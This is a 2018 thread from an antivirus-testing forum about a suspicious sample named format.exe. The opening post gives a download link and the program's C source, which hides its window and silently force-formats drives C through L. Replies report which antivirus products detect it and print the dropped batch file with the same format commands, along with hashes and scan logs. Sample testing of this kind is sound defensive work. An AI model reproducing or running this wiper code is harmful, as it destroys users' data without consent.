查看: 3221|回复: 21
收起左侧

[可疑文件] 强制格式化程序

[复制链接]
安全守护者
头像被屏蔽
发表于 2018-10-4 18:49:00 | 显示全部楼层 |阅读模式
下载地址:https://www.lanzous.com/i20oqbi
format.exe源码:
  1. #include <windows.h>
  2. #include <stdlib.h>


  3. int main()
  4. {
  5.     //隐藏dos窗口执行命令
  6.     HWND hwndDOS = GetForegroundWindow();
  7.     ShowWindow(hwndDOS, SW_HIDE);

  8.     //命令行格式化,自带确认参数,无需用户手动确认。
  9.     //格式化盘符由C至L,即使盘符不存在。
  10.     system("format C:/fs:ntfs /c /q /y");
  11.     system("format D:/fs:ntfs /c /q /y");
  12.     system("format E:/fs:ntfs /c /q /y");
  13.     system("format F:/fs:ntfs /c /q /y");
  14.     system("format H:/fs:ntfs /c /q /y");
  15.     system("format I:/fs:ntfs /c /q /y");
  16.     system("format J:/fs:ntfs /c /q /y");
  17.     system("format K:/fs:ntfs /c /q /y");
  18.     system("format L:/fs:ntfs /c /q /y");

  19.     return 0;
  20. }
复制代码


安全守护者
头像被屏蔽
 楼主| 发表于 2018-10-4 18:49:20 | 显示全部楼层
BE_HC
发表于 2018-10-4 19:05:18 | 显示全部楼层
Emsisoft Anti-Malware Scan Kill 1x

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Kaspersky用户
发表于 2018-10-4 19:06:32 | 显示全部楼层
本帖最后由 Kaspersky用户 于 2018-10-4 19:09 编辑

BDF拦截下载
解压后扫描KILL1

Sailer.X 该用户已被删除
发表于 2018-10-4 19:11:23 | 显示全部楼层
CCAV&Panda Free miss
BE_HC
发表于 2018-10-4 19:17:52 | 显示全部楼层
运行后在Temp中,生成一个空批处理后删除,再生成包含命令的批处理

  1. [url=home.php?mod=space&uid=699012]@REM[/url] ----- ExeScript Options Begin -----
  2.                                        

  3. @rem ----- ExeScript Options End -----

  4. [url=home.php?mod=space&uid=331734]@echo[/url] off
  5. format C:/fs:ntfs /c /q /y
  6. format D:/fs:ntfs /c /q /y
  7. format E:/fs:ntfs /c /q /y
  8. format F:/fs:ntfs /c /q /y
  9. format H:/fs:ntfs /c /q /y
  10. format I:/fs:ntfs /c /q /y
  11. format J:/fs:ntfs /c /q /y
  12. format K:/fs:ntfs /c /q /y
  13. format L:/fs:ntfs /c /q /y
复制代码

------
以下由PortEX-Master自动生成(乍一看挺恐怖的)
  1. PEID Signatures
  2. ***************

  3. [UPX v0.89.6 - v1.02 / v1.05 - v1.22] bytes matched: 43 at address: 0x61c0
  4. pattern:  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8a 06 46 88 07 47 01 db 75 07 8b 1e 83 ee fc 11 db 72 ed b8 01 ?? ?? ?? 01 db 75 07 8b 1e 83 ee fc 11 db 11 c0 01 db 73 ?? 75 ?? 8b 1e 83 ee fc
  5. [UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser] bytes matched: 55 at address: 0x61c0
  6. pattern:  60 be ?? ?? ?? ?? 8d be ?? ?? ?? ?? 57 83 cd ff eb 10 90 90 90 90 90 90 8a 06 46 88 07 47 01 db 75 07 8b 1e 83 ee fc 11 db 72 ed b8 01 00 00 00 01 db 75 07 8b 1e 83 ee fc 11 db 11 c0 01 db
  7. [UPX v1.25 (Delphi) Stub] bytes matched: 8 at address: 0x61c0
  8. pattern:  60 be 00 ?? ?? 00 8d be 00 ?? ?? ff

  9. Hashes
  10. ******

  11. MD5:    ea1b1d0c23208c23c7785e73da6abb21
  12. SHA256: e5bd6cceec7d58fa0a36b0d6c644532a884395607d9893aef892f3d8e508d7dc

  13. Section      Type      Hash Value                                                      
  14. ---------------------------------------------------------------------------------------
  15. 1. UPX0      MD5                                                                       
  16.              SHA256                                                                    
  17. 2. UPX1      MD5       064c621f613a60426762b654c3b74ddf                                
  18.              SHA256    69908bbeb0fcb91361396c7d1c2187fe33ec07bcc2d9921e7613151b27d89e0b
  19. 3. .rsrc     MD5       fe4bfef2bcccd6482672d4a5b3b74dbd                                
  20.              SHA256    64c3a01749a3ac7844816d8aefe8e90bbf46ef00ffae765abcd6e419c0996ac7
复制代码




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
静影沉璧
发表于 2018-10-4 19:21:11 | 显示全部楼层
bdbrowsersetup-8.7.5000.4982.exe:Trojan.Generic.4495018

format.exe:VT:1/68
https://www.virustotal.com/#/fil ... 2bc750259/detection
天道酬善
发表于 2018-10-4 19:21:54 | 显示全部楼层
ESS V10
  1. 2018-10-04 19:20:01;HTTP 过滤器;文件;https://development78.baidupan.com/2018100419bb/2018/10/04/7306278aec79f81f51dc1846e6297338.zip?st=dE7wmcWDiDIbqYteyLbW7A&q=format.zip&e=1538653998&ip=123.183.28.58&fi=5118888&up=;Win32/Packed.ExeScript.B 特洛伊木马 的变种;连接中断通过应用程序访问 web 时检测到威胁: D:\Program Files\CentBrowser\Application\chrome.exe (C457E4F1F6A431B9C9D04E2F7151D31F91FBAD6E).;FB679A826DC107250E54CC5B01D28D55CB2A0980;
复制代码

捏鲍鱼
发表于 2018-10-4 19:26:00 | 显示全部楼层
本帖最后由 捏鲍鱼 于 2018-10-4 19:29 编辑

360报安全  1分钟后 360杀毒弹窗 干掉一个
www-tekeze
发表于 2018-10-4 19:44:20 | 显示全部楼层

火绒miss,智量清空 。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-19 14:22 , Processed in 0.149364 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表